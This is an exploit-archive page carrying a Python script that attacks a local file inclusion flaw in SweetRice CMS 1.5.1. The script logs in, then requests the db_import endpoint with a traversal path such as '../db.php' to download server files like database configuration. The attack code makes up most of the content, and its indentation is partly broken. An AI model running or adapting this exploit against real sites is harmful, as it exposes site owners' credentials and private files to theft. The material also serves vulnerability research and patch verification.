SweetRice 1.5.1 Local File Inclusion

SweetRice 1.5.1 Local File Inclusion: Posted Nov 2, 2016; Authored by Ehsan Hosseini; SweetRice version 1.5.1 suffers from a local file inclusion vulnerability.; tags | exploit, local, file inclusion; SHA-256 | 88b2e9b807e6b3fb469cdf98b022ad6ccc0d8005acdd320eecc5391780b6e667; Download | Favorite | View

SweetRice 1.5.1 Local File Inclusion

||#/usr/bin/python
#-*- Coding: utf-8 -*-
# Exploit Title: SweetRice 1.5.1 - Local File Inclusion
# Exploit Author: Ashiyane Digital Security Team
# Date: 03-11-2016
# Vendor: http://www.basic-cms.org/
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
# Version: 1.5.1
# Platform: WebApp - PHP - Mysql

import requests
import os
from requests import session

if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
pass
banner = '''
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
|  _________                      __ __________.__                    |
| /   _____/_  _  __ ____   _____/  |\______   \__| ____  ____      |
| \_____  \\ \/ \/ // __ \_/ __ \   __\       _/  |/ ___\/ __ \     |
| /        \\     /\  ___/\  ___/|  | |    |   \  \  \__\  ___/     |
|/_______  / \/\_/  \___  >\___  >__| |____|_  /__|\___  >___  >    |
|        \/             \/     \/            \/        \/    \/     |
|    > SweetRice 1.5.1 Local File Inclusion                            |
|    > Script Cod3r : Ehsan Hosseini                                    |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
'''

print(banner)


# Get Host & User & Pass & LfiPath
host = input("Enter The Target URL(Example : localhost.com) : ")
username = input("Enter Username : ")
password = input("Enter Password : ")
lfipath = input("Enter File To Download(Example : ../db.php) : ")
xplfile = input("Enter Name of File To Save(Example : ../db.php) : ")

userinfo = {
'user':username,
'passwd':password,
'rememberMe':''
}

with session() as r:
login = r.post('http://' + host + '/as/?type=signin', data=userinfo)
success = 'Login success'
if login.status_code == 200:
         print("[+] Sending User&Pass...")
         if login.text.find(success) > 1:
             print("[+] Login Succssfully...")
         else:
             print("[-] User or Pass is incorrent...")
             print("Good Bye...")
             exit()
pass
         pass
     dlfile = r.get('http://' + host + 
'/as/?type=data&mode=db_import&db_file=' + lfipath + '&form_mode=save')

     if dlfile.status_code == 200:

         print('[+] Exploit...')
file = open(xplfile, "w")
file.write(dlfile.text)
file.close()
         print('[+] File Saved...')
         print('[+] Exploit By Ehsan Hosseini')
     else:
         print("[-] Error in Exploting...")
pass ||

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 55 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Google Security Research 6 files
Apple 6 files
Milad Karimi 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,333)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,578)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,460)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

SweetRice 1.5.1 Local File Inclusion

SweetRice 1.5.1 Local File Inclusion

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

SweetRice 1.5.1 Local File Inclusion

Share This

SweetRice 1.5.1 Local File Inclusion

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems